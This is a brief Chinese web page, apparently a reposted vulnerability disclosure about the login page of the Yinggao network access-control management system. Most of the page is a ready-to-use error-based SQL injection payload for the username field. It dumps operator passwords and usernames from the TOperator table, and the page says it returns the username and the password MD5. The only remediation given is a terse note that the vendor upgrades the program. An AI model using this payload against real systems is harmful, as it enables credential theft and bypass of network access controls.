盈高入网规范管理系统 是常见的准入控制设备,但其存在多处 漏洞 可以实现准入绕过,影响内网安全。 登陆用户名输入
aaa'and (select 1 from(select count(*),concat((Select substring(group_concat(Password,0x3a,UserName),1,64) from TOperator limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
返回用户名与密码md5
修复方案: 设备厂商升级程序。。。程序为php~
查看更多关于盈高入网规范管理系统 登陆页面注入 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14336